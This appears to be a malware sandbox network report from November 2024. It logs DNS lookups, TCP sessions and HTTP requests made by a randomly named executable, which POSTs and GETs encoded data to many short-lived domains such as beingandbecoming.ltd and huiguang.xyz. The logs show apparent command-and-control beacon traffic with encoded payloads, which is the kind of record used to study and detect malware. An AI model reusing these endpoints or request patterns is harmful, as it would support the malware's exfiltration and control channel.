Nov 22, 2024 14:46:25.163870096 CET | 80 | 49730 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:25.163908958 CET | 80 | 49730 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:25.163976908 CET | 49730 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:25.392149925 CET | 49730 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:26.415712118 CET | 49731 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:26.535427094 CET | 80 | 49731 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:26.535561085 CET | 49731 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:26.546710014 CET | 49731 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:26.666501999 CET | 80 | 49731 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:26.666523933 CET | 80 | 49731 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:27.865304947 CET | 80 | 49731 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:27.865339994 CET | 80 | 49731 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:27.865597963 CET | 49731 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:28.048391104 CET | 49731 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:29.067111015 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:29.186753035 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:29.187056065 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:29.195655107 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:29.315335989 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:30.465423107 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:30.465539932 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:30.465574026 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:30.465806007 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:30.465806007 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:30.468641996 CET | 49732 | 80 | 192.168.2.8 | 103.224.182.242
Nov 22, 2024 14:46:30.588252068 CET | 80 | 49732 | 103.224.182.242 | 192.168.2.8
Nov 22, 2024 14:46:36.397830009 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
Nov 22, 2024 14:46:36.517748117 CET | 80 | 49733 | 154.23.184.218 | 192.168.2.8
Nov 22, 2024 14:46:36.517867088 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
Nov 22, 2024 14:46:36.529112101 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
Nov 22, 2024 14:46:36.649667025 CET | 80 | 49733 | 154.23.184.218 | 192.168.2.8
Nov 22, 2024 14:46:38.032784939 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
Nov 22, 2024 14:46:38.089654922 CET | 80 | 49733 | 154.23.184.218 | 192.168.2.8
Nov 22, 2024 14:46:38.089787006 CET | 80 | 49733 | 154.23.184.218 | 192.168.2.8
Nov 22, 2024 14:46:38.089967966 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
Nov 22, 2024 14:46:38.089967966 CET | 49733 | 80 | 192.168.2.8 | 154.23.184.218
                                                                  Nov 22, 2024 14:46:38.152295113 CET8049733154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:38.152499914 CET4973380192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.052858114 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.172796965 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:39.173837900 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.191097975 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:39.310872078 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.704853058 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.800514936 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.800586939 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.800592899 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.800643921 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:40.824551105 CET8049734154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:40.824655056 CET4973480192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.723628998 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.843556881 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:41.843712091 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.854500055 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:41.974706888 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:41.974757910 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.360922098 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.418164968 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.418289900 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.418308973 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.418380976 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:43.480703115 CET8049735154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:43.480992079 CET4973580192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.380143881 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.500030041 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:44.500372887 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.510334969 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:44.630093098 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.132545948 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.133691072 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:46.133779049 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:46.136298895 CET4973680192.168.2.8154.23.184.218
                                                                  Nov 22, 2024 14:46:46.258049965 CET8049736154.23.184.218192.168.2.8
                                                                  Nov 22, 2024 14:46:51.622291088 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.741992950 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:51.742105961 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.763345957 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:51.883060932 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207158089 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207422972 CET804973731.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:53.207473040 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:53.267179012 CET4973780192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.337866068 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.457833052 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:54.458028078 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.531384945 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:54.651120901 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800420046 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800457001 CET804973831.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:55.800508022 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:56.032860994 CET4973880192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.140054941 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.259859085 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:57.259948015 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.324260950 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:57.444437027 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:57.444493055 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697161913 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697194099 CET804973931.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:58.697237015 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:58.830005884 CET4973980192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:59.849550009 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:46:59.969391108 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:46:59.969542980 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:00.031788111 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:00.151639938 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304291010 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304357052 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:01.304687977 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:01.308343887 CET4974080192.168.2.831.31.196.17
                                                                  Nov 22, 2024 14:47:01.428591967 CET804974031.31.196.17192.168.2.8
                                                                  Nov 22, 2024 14:47:07.122124910 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.241974115 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:07.242198944 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.265989065 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:07.385935068 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567526102 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567559958 CET804974164.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:08.567712069 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:08.783128977 CET4974180192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.303333044 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.423293114 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:10.423525095 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.438092947 CET4974280192.168.2.864.190.63.222
                                                                  Nov 22, 2024 14:47:10.557813883 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826364040 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826395988 CET804974264.190.63.222192.168.2.8
                                                                  Nov 22, 2024 14:47:11.826466084 CET4974280192.168.2.864.190.63.222
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 22, 2024 14:44:47.325644016 CET5294653192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:44:48.163919926 CET53529461.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:04.924666882 CET6499553192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:05.734055996 CET53649951.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:20.069087982 CET4991653192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:20.638358116 CET53499161.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:35.100126982 CET5038853192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:35.605865002 CET53503881.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:45:49.819225073 CET6131153192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:45:50.522162914 CET53613111.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:04.927434921 CET5268453192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:05.502995014 CET53526841.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:19.911709070 CET6362953192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:20.907830954 CET6362953192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:21.085772991 CET53636291.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:21.085828066 CET53636291.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:35.476583004 CET5090853192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:36.395114899 CET53509081.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:46:51.145904064 CET6407453192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:46:51.616297960 CET53640741.1.1.1192.168.2.8
                                                                  Nov 22, 2024 14:47:06.391652107 CET5190753192.168.2.81.1.1.1
                                                                  Nov 22, 2024 14:47:07.115411043 CET53519071.1.1.1192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 22, 2024 14:44:47.325644016 CET | 192.168.2.8 | 1.1.1.1 | 0xf093 | Standard query (0) | www.huiguang.xyz | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:04.924666882 CET | 192.168.2.8 | 1.1.1.1 | 0x6b59 | Standard query (0) | www.beingandbecoming.ltd | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:20.069087982 CET | 192.168.2.8 | 1.1.1.1 | 0xb05e | Standard query (0) | www.futurevision.life | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:35.100126982 CET | 192.168.2.8 | 1.1.1.1 | 0xdca5 | Standard query (0) | www.schedulemassage.xyz | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:49.819225073 CET | 192.168.2.8 | 1.1.1.1 | 0x9ede | Standard query (0) | www.mcfunding.org | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:04.927434921 CET | 192.168.2.8 | 1.1.1.1 | 0x4222 | Standard query (0) | www.migorengya8.click | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:19.911709070 CET | 192.168.2.8 | 1.1.1.1 | 0x922f | Standard query (0) | www.klohk.tech | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:20.907830954 CET | 192.168.2.8 | 1.1.1.1 | 0x922f | Standard query (0) | www.klohk.tech | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:35.476583004 CET | 192.168.2.8 | 1.1.1.1 | 0x3309 | Standard query (0) | www.d63dm.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:51.145904064 CET | 192.168.2.8 | 1.1.1.1 | 0x7ce7 | Standard query (0) | www.servannto.site | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:47:06.391652107 CET | 192.168.2.8 | 1.1.1.1 | 0x8f86 | Standard query (0) | www.telforce.one | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 22, 2024 14:44:48.163919926 CET | 1.1.1.1 | 192.168.2.8 | 0xf093 | No error (0) | www.huiguang.xyz | | 154.216.76.80 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:05.734055996 CET | 1.1.1.1 | 192.168.2.8 | 0x6b59 | No error (0) | www.beingandbecoming.ltd | beingandbecoming.ltd | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 14:45:05.734055996 CET | 1.1.1.1 | 192.168.2.8 | 0x6b59 | No error (0) | beingandbecoming.ltd | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:05.734055996 CET | 1.1.1.1 | 192.168.2.8 | 0x6b59 | No error (0) | beingandbecoming.ltd | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:20.638358116 CET | 1.1.1.1 | 192.168.2.8 | 0xb05e | No error (0) | www.futurevision.life | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:35.605865002 CET | 1.1.1.1 | 192.168.2.8 | 0xdca5 | No error (0) | www.schedulemassage.xyz | schedulemassage.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 14:45:35.605865002 CET | 1.1.1.1 | 192.168.2.8 | 0xdca5 | No error (0) | schedulemassage.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:35.605865002 CET | 1.1.1.1 | 192.168.2.8 | 0xdca5 | No error (0) | schedulemassage.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:50.522162914 CET | 1.1.1.1 | 192.168.2.8 | 0x9ede | No error (0) | www.mcfunding.org | mcfunding.org | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 14:45:50.522162914 CET | 1.1.1.1 | 192.168.2.8 | 0x9ede | No error (0) | mcfunding.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:45:50.522162914 CET | 1.1.1.1 | 192.168.2.8 | 0x9ede | No error (0) | mcfunding.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:05.502995014 CET | 1.1.1.1 | 192.168.2.8 | 0x4222 | No error (0) | www.migorengya8.click | migorengya8.click | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 14:46:05.502995014 CET | 1.1.1.1 | 192.168.2.8 | 0x4222 | No error (0) | migorengya8.click | | 198.252.98.54 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:21.085772991 CET | 1.1.1.1 | 192.168.2.8 | 0x922f | No error (0) | www.klohk.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:21.085828066 CET | 1.1.1.1 | 192.168.2.8 | 0x922f | No error (0) | www.klohk.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:36.395114899 CET | 1.1.1.1 | 192.168.2.8 | 0x3309 | No error (0) | www.d63dm.top | d63dm.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 14:46:36.395114899 CET | 1.1.1.1 | 192.168.2.8 | 0x3309 | No error (0) | d63dm.top | | 154.23.184.218 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:46:51.616297960 CET | 1.1.1.1 | 192.168.2.8 | 0x7ce7 | No error (0) | www.servannto.site | | 31.31.196.17 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 14:47:07.115411043 CET | 1.1.1.1 | 192.168.2.8 | 0x8f86 | No error (0) | www.telforce.one | | 64.190.63.222 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 154.216.76.80 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 14:44:48.298755884 CET | 553 | OUT | GET /hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.huiguang.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 22, 2024 14:44:49.867388964 CET | 827 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:44:49 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 601
                                                                  Last-Modified: Thu, 21 Nov 2024 04:22:01 GMT
                                                                  Connection: close
                                                                  ETag: "673eb569-259"
                                                                  Accept-Ranges: bytes
                                                                  Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817'; }, 1000); // 1 }; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 14:45:05.868563890 CET | 831 | OUT | POST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWozlaKStlYn4+hx60dyjI7RCkq3MUgQnjH3CBDs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe

Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 14:45:08.530750990 CET | 851 | OUT | POST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL75pkpf6RXNP5knyfU7Fnb3TOmqGJh+jU4HEzuC0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  3 | 192.168.2.8 | 49711 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:11.188309908 CET | 1868 | OUT | POST /79tr/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.beingandbecoming.ltd
                                                                  Referer: http://www.beingandbecoming.ltd/79tr/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupmBzhBzq92vZalYgr3EVmBAzjLcfDrwp8frOXWcJC/TPf/O1LnMe16xh2pLGtwraYcV4nYsKkoSp3EDmClKWobU8aAfJ5kw3n0Z84uaHLo4HClm2stA7iuy+k0YOHQjCCigtIWHXQXi7Jq94PVRNfs7s36xpCsFCOCOrMiUqTRSXKoaUc/oShZlyzvUf/8GVqaHF64bs6K9cqK+1FyiwCG47qoCLfLLDP6W/A4hQPR0tpRXEiT92kDHaOTZ1E2tIzdBbDN2R47K3Crav5wH1IML3UBjnsWIkGpf2lObVS466XHSn6lWj65K1564QMhrR9QeoUMU2gG3dOQ5SIWWCvmri83kWHBWFIHyywL0VoVWM+oOjbBaytyxmert2TlZ1sS8Mph9Zx4I9BcYJTl6Ze6a1UdIT1dsETfqR2+kW/XKOjHJnqt2lUyWREygLJkBcLiGG4vG+5GwukJRzMIu43fRJpIe6LhCydYHX1QdKnP1vslZIU/B3pEkm3v+CPL4b/niJuC/SpwA2rZFeAdduGMz7uqMDPnUHiyxoHb3m6o/zjPDRC26qhacEW2NIG9I2clU3SL4vUZnT1gOt+YoimtsoxmZV5tD/vZMeL0IlbvKHHlSuDUk0rnMgR2jGLCsGJBXUPwQ5flcOJFwjvdlvai0e0EBOjMW+O2AWhePui7/dZPv/KtBQMAmgnGtiklJuDtc6ydv8lzROYAwTAeXq0Oa+3txCfxkIF0ZZl2wzZwTHUCdqCY7WCbtVdWoEW/p2nhQYtmwDFjF8KwSF50B3RXMEVIz9Mln90p6BtgeYrskX/lTuKKC8rb4q1ifiGZJ0Loo [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  4 | 192.168.2.8 | 49712 | 3.33.130.190 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:45:13.862771034 CET | 561 | OUT | GET /79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.beingandbecoming.ltd
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:15.054389954 CET | 413 | IN | HTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
